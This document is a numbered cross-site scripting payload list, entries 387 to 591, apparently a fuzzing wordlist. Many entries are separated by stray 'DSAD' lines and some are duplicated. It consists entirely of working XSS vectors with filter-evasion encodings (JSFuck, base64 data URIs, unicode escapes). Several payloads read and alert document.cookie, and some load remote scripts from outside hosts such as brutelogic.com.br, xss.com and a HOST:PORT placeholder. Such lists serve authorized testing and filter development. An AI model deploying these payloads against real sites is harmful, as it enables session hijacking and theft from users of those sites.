  387. image <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #

    DSAD

  388. image <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";getElementById("safe123").click=function()+{alert(Safe.get());};getElementById("safe123").click(test);</SCRIPT>#

    DSAD

  389. image <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>#

    DSAD

  390. image <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";document.getElementById("safe123").click=function()+{alert(Safe.get());};document.getElementById("safe123").click(test);'><source>#

    DSAD

  391. image <script for=document event=onreadystatechange>getElementById('safe123').click()</script>

    DSAD

  392. image <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>

    DSAD

  393. image <iframe src="404" onload="frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  394. image <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>

    DSAD

  395. image <iframe src="404" onload="content.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  396. image <iframe src="404" onload="self.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  397. image <iframe src="404" onload="top.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  398. image <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#

    DSAD

  399. image <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  400. image <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  401. image <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href="javascript:\"<script>var%20xhr%20%3D%20new%20XMLHttpRequest()%3Bxhr.open('GET'%2C%20'http%3A%2F%2Fhtml5sec.org%2Fxssme2'%2C%20true)%3Bxhr.onload%20%3D%20function()%20%7B%20alert(xhr.responseText.match(%2Fcookie%20%3D%20'(.*%3F)'%2F)%5B1%5D)%20%7D%3Bxhr.send()%3B<\/script>\"") autofocus></textarea>

    DSAD

  402. image <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  403. image <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  404. image <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src="javascript:parent.x(window)"><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  405. image <script>function x(window) { eval(location.hash.substr(1)) }; open("javascript:opener.x(window)")</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  406. image <object data="data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=">

    DSAD

  407. image <textarea id=ta onfocus="write('<script>alert(1)</script>')" autofocus></textarea>

    DSAD

  408. image <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

    DSAD

  409. image <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ+ name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>

    DSAD

  410. image <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload="xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();">`>

    DSAD

  411. image <a target="x" href="xssme?xss=<script>addEventListener("DOMFrameContentLoaded", function(e) {e.stopPropagation();}, true);</script><iframe src="data:text/html,%3cscript%3eObject.defineProperty(top, 'MyEvent', {value: Object, configurable: true});function y() {alert(top.Safe.get());};event = new Object();event.type = 'click';event.isTrusted = true;y(event);%3c/script%3e"></iframe>

    DSAD

  412. image <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  413. image <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src="javascript:parent.x(window);"></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  414. image Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>

    DSAD

  415. image <a href="javascript:\u0061l&#101rt(1)"><button>

    DSAD

  416. image <div onmouseover='alert(1)'>DIV</div>

    DSAD

  417. image <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

    DSAD

  418. image <a href="jAvAsCrIpT:alert(1)">X</a>

    DSAD

  419. image <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?

    DSAD

  420. image <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?

    DSAD

  421. image <var onmouseover="prompt(1)">On Mouse Over</var>?

    DSAD

  422. image <a href=javascript:alert(document.cookie)>Click Here</a>

    DSAD

  423. image <img src="/" =_=" title="onerror='prompt(1)'">

    DSAD

  424. image <%<!--'%><script>alert(1);</script -->

    DSAD

  425. image <script src="data:text/javascript,alert(1)"></script>

    DSAD

  426. image <input value=<><iframe/src=javascript:confirm(1)

    DSAD

  427. image <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															(
																1
																	)></iframe> ?

    DSAD

  428. image <input type="text" value=``<div/onmouseover='alert(1)'>X</div>

    DSAD

  429. image <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	(	1	)></iframe>

    DSAD

  430. image <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

    DSAD

  431. image <meta http-equiv="refresh" content="0;javascript:alert(1)"/>?

    DSAD

  432. image <math><a xlink:href="//jsfiddle.net/t846h/">click

    DSAD

  433. image <svg contentScriptType=text/vbs><script>MsgBox+1

    DSAD

  434. image <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?

    DSAD

  435. image <a href="data:text/html;base64_,<svg/onload=\u0061l&#101rt(1)>">X</a

    DSAD

  436. image <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

    DSAD

  437. image <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

    DSAD

  438. image <script/src="data:text/j\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=/

    DSAD

  439. image <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061lert(/XSS/)></script ????????????

    DSAD

  440. image <object data=javascript:\u0061l&#101rt(1)>

    DSAD

  441. DSAD

  442. image <body/onload=<!-->&#10alert(1)>

    DSAD

  443. image <script itworksinallbrowsers>/*<script* */alert(1)</script ?

    DSAD

  444. image <svg><script>//
confirm(1);</script </svg>

    DSAD

  445. image <svg><script onlypossibleinopera:-)> alert(1)

    DSAD

  446. image <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

    DSAD

  447. image <div/onmouseover='alert(1)'> style="x:">

    DSAD

  448. image <--`<img/src=` onerror=alert(1)> --!>

    DSAD

  449. image <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> ?

    DSAD

  450. image <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?

    DSAD

  451. image "><img src=x onerror=window.open('https://www.google.com/');>

    DSAD

  452. image <form><button formaction=javascript:alert(1)>CLICKME

    DSAD

  453. image <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?

    DSAD

  454. image <math><a xlink:href="//jsfiddle.net/t846h/">click

    DSAD

  455. image <iframe src="data:text/html,<script>alert(1)</script>"></iframe>

    DSAD

  456. image <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

    DSAD

  457. DSAD

  458. innerHTML=location.hash>#<script>alert(1)</script>

  459. <x contenteditable onkeypress=alert(1)>press any key!

  460. <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

  461. */alert(1)">'onload="/*<svg/1='

  462. `-alert(1)">'onload="`<svg/1='

  463. */</script>'>alert(1)/*<script/1='

  464. <math><brute href=javascript:alert(1)>click

  465. <isindex action=javascript:alert(1) type=submit value=click>

  466. <form action=javascript:alert(1)><input type=submit>

  467. <form><button formaction=javascript:alert(1)>click

  468. <form><input formaction=javascript:alert(1) type=submit value=click>

  469. <form><input formaction=javascript:alert(1) type=image value=click>

  470. <form><input formaction=javascript:alert(1) type=image src=SOURCE>

  471. <isindex formaction=javascript:alert(1) type=submit value=click>

  472. <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

  473. <svg><script xlink:href=data:,alert(1) />

  474. <math><brute xlink:href=javascript:alert(1)>click

  475. <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

  476. "><img src=1 onerror=alert(1)>.gif

  477. <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

  478. GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

  479. "><script src=data:,alert(1)//

  480. <script src="//brutelogic.com.br/1.js#

  481. "><script src=//brutelogic.com.br/1.js#

  482. <link rel=import href="data:text/html,<script>alert(1)</script>

  483. <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

  484. "><link rel=import href=data:text/html,<script>alert(1)</script>

  485. <body onhashchange=alert(1)><a href=#x>click this!#x

  486. <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

  487. <body onscroll=alert(1)><br><br><br><br>

  488. <video onloadstart=alert(1)><source>

  489. <form onsubmit=alert(1)><input type=submit>

  490. <select onchange=alert(1)><option>1<option>2

  491. <menu id=x contextmenu=x onshow=alert(1)>right click me!

  492. <scr<script>ipt>alert('XSS')</scr<script>ipt>

  493. "><script>alert('XSS')</script>

  494. "><script>alert(String.fromCharCode(88,83,83))</script>

  495. <img src=x onerror=alert(String.fromCharCode(88,83,83));>

  496. <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

  497. "><img src=x onerror=alert('XSS');>

  498. "><img src=x onerror=alert(String.fromCharCode(88,83,83));>

  499. "><svg/onload=alert(String.fromCharCode(88,83,83))>

  500. <video><source onerror="javascript:alert(1)">

  501. <video src=_ onloadstart="alert(1)">

  502. <details/open/ontoggle="alert`1`">

  503. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

  504. <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>

  505. data:text/html,<script>alert(0)</script>

  506. jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )// //</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

  507. ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http: //i.imgur.com/P8mL8.jpg">

  508. " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

  509. ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

  510. javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

  511. javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

  512. javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

  513. javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

  514. javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

  515. javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

  516. javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

  517. --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

  518. /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

  519. javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

  520. /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

  521. <script>window['alert'](document['domain'])<script>

  522. <script>window['alert'](0)</script>

  523. <script>parent['alert'](1)</script>

  524. <script>self['alert'](2)</script>

  525. <script>top['alert'](3)</script>

  526. <x contenteditable onkeypress=alert(1)>press any key!

  527. <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

  528. */alert(1)">'onload="/*<svg/1='

  529. `-alert(1)">'onload="`<svg/1='

  530. */</script>'>alert(1)/*<script/1='

  531. <math><brute href=javascript:alert(1)>click

  532. <form action=javascript:alert(1)><input type=submit>

  533. <isindex action=javascript:alert(1) type=submit value=click>

  534. <form><button formaction=javascript:alert(1)>click

  535. <form><input formaction=javascript:alert(1) type=image value=click>

  536. <form><input formaction=javascript:alert(1) type=submit value=click>

  537. <form><input formaction=javascript:alert(1) type=image src=SOURCE>

  538. <isindex formaction=javascript:alert(1) type=submit value=click>

  539. <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

  540. <svg><script xlink:href=data:,alert(1) />

  541. <math><brute xlink:href=javascript:alert(1)>click

  542. <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

  543. "><img src=1 onerror=alert(1)>.gif

  544. <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

  545. GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

  546. <script src="//brutelogic.com.br/1.js#

  547. "><script src=data:,alert(1)//

  548. "><script src=//brutelogic.com.br/1.js#

  549. <link rel=import href="data:text/html,<script>alert(1)</script>

  550. "><link rel=import href=data:text/html,<script>alert(1)</script>

  551. <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

  552. <body onhashchange=alert(1)><a href=#x>click this!#x

  553. <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

  554. <body onscroll=alert(1)><br><br><br><br>

  555. <video onloadstart=alert(1)><source>

  556. <form onsubmit=alert(1)><input type=submit>

  557. <select onchange=alert(1)><option>1<option>2

  558. <menu id=x contextmenu=x onshow=alert(1)>right click me!

  559. <script>\u0061\u006C\u0065\u0072\u0074(1)</script>

  560. <img src="1" onerror="alert(1)" />

  561. <iframe src="javascript:alert(1)"></iframe>

  562. <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

  563. <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

  564. <script ~~~>confirm(1)</script ~~~>

  565. <script>$=1,\u0061lert($)</script>

  566. <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>

  567. <</script/script><script ~~~>\u0061lert(1)</script ~~~>

  568. </style></scRipt><scRipt>alert(1)</scRipt>

  569. <img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>

  570. <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>

  571. <svg><x><script>alert('1'&#41</x>

  572. <iframe src=""/srcdoc='<svg onload=alert(1)>'>

  573. '"--></style></script><script>shadowlabs(0x000045)</script>

  574. <<scr\0ipt/src=http://xss.com/xss.js></script

  575. "><iframe src="http://google.com"% 3E

  576. '"--></style></script><script>RWAR(0x00010E)</script>

  577. '<script>window.onload=function(){document.forms[0].message.value='1';}</script>

  578. x”</title><img src=x onerror=alert(1)>

  579. <script> document.getElementById("safe123").setCapture(); document.getElementById("safe123").click(); </script>

  580. <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>

  581. <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>

  582. <script>(function() {var event = document.createEvent("MouseEvents");event.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>

  583. <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

  584. <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

  585. <script>alert(document.documentElement.innerHTML.match(/'([^']+)/)[1])</script>

  586. <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']+)/)[1])</script>

  587. <script> d = document.createElement("div"); d.appendChild(document.head.cloneNode(true)); alert(d.innerHTML.match("cookie = '(.*?)'")[1]); </script>

  588. <script> var xdr = new ActiveXObject("Microsoft.XMLHTTP"); xdr.open("get", "/xssme2?a=1", true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*?)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>

  589. <iframe id="ifra" src="/"></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write("<scr" + "ipt>top.foo = Object.defineProperty</scr" + "ipt>"); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>

  590. <script>alert(document.head.innerHTML.substr(146,20));</script>

  591. <script>alert(document.head.childNodes[3].text)</script>

